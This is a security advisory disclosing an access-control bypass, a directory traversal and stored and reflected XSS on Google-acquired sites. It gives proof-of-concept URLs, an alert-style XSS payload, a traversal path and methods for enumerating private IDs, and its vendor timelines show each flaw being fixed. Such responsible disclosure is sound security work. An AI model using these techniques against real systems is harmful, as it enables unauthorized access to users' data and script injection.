Multiple security vulnerabilities in domains acquired by Google

Description

Several vulnerabilities have been discovered in domains recently acquired by Google between 2017, April and 2017, September.

The reported vulnerabilities are related to the following domains: withgoogle.com and kaggle.com.

The flaws are of the following kinds: broken access control, directory traversal and XSS vulnerabilities.

1. Broken Access Control in tourbuilder.withgoogle.com

Vulnerability: CWE-284

Access Vector: Remote

Security Risk: High

CVSS Base Score: 7.5

CVSS Vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Vulnerability Description

Access control involves the use of several protection mechanisms such as authentication (proving the identity of an actor), authorization (handling access permissions), and accountability (tracking of activities).

The website tourbuilder.withgoogle.com does not restrict access to private resources from an unauthorized user. Attackers can exploit this flaw to access unauthorized data, such as access other users' private tours.

Proof of Concept

Steps to reproduce:

  1. Log in here: https://tourbuilder.withgoogle.com
  2. Now try to access to the following private tour: https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAg4fAoQoM
  3. Then you will get the following message : "You do not have permission to view this tour."
  4. We were able to bypass this protection and get access to this private tour with the link below: https://tourbuilder.withgoogle.com/tours/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAg4fAoQoM/csv

Then, by checking the downloaded csv file, it is possible to find all information related to this private tour.

The proof of concept is shown in the following picture: Private tour.

Since all private tours have the same format : https://tourbuilder.withgoogle.com/builder#play/ID, it is possible to get an unauthorized access to any tour by following this format : https://tourbuilder.withgoogle.com/tours/ID/csv

  1. Note that it is possible to enumerate the ID of private tours.

    First using the following GHDB:

site:tourbuilder.withgoogle.com/tour intitle:"Sign in"

We got several links like https://tourbuilder.withgoogle.com/builder#play/ID:

https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgICA9_uu5wkM
https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDA2cqHmAoM
https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAiLq67AoM
https://tourbuilder.withgoogle.com/builder#play/ahJzfmd3ZWItdG91cmJ1aWxkZXJyEQsSBFRvdXIYgIDAiq2csQkM
...

Brute forcing private IDs also works, as in fact only a few characters change (7 chars).

Timeline (dd/mm/yyyy)

  • 28/05/2017 : Initial discovery
  • 28/05/2017 : Contact with vendor team
  • 30/05/2017 : Vendor response : Nice catch! Vendor response
  • 01/06/2017 : Vendor release fix

2. Directory traversal vulnerability in edutrainingcenter.withgoogle.com

Vulnerability: CWE-22

Access Vector: Remote

Security Risk: High

CVSS Base Score: 8.6

CVSS Vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Vulnerability Description

A directory traversal vulnerability has been found on edutrainingcenter.withgoogle.com. This vulnerability allows remote attackers to access restricted directories and read arbitrary files.

Proof of Concept

Steps to reproduce: 1. Click on the link below: https://edutrainingcenter.withgoogle.com/trainer_course/edu_assets/images/%5C../%5C../Gemfile

It is possible to download the Gemfile file.

Timeline (dd/mm/yyyy)

  • 16/04/2017 : Initial discovery
  • 16/04/2017 : Contact with vendor team
  • 18/04/2017 : Vendor acknowledgement: Nice catch! Vendor response
  • 05/05/2017 : Bug Patched

3. Stored XSS Vulnerability in kaggle.com

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 7.2

CVSS Vector string: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Vulnerability Description

Two cross-site scripting (XSS) vulnerabilities have been found on kaggle.com. They allow remote attackers to inject arbitrary JavaScript.

Proof of Concept

Steps to reproduce:

  1. Please login to kaggle.com

  2. Then change your display name to the following payload: <marquee onstart=alert(1)>test

  3. As soon as a victim follows you (https://www.kaggle.com/AttackerUsername), the injections are triggered.

There is also a reflected XSS in the link below (triggered using Firefox): https://www.kaggle.com/account/authenticate/facebook/return?returnUrl=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

Timeline (dd/mm/yyyy)

  • 07/09/2017 : Initial discovery
  • 07/09/2017 : Vendor notification
  • 12/09/2017 : Vendor responses are shown in the following picture: Reflected XSS
  • 28/11/2017 : Vendor fixes vulnerabilities

Credits

  • Issam Rabhi (i dot rabhi at sysdream dot com)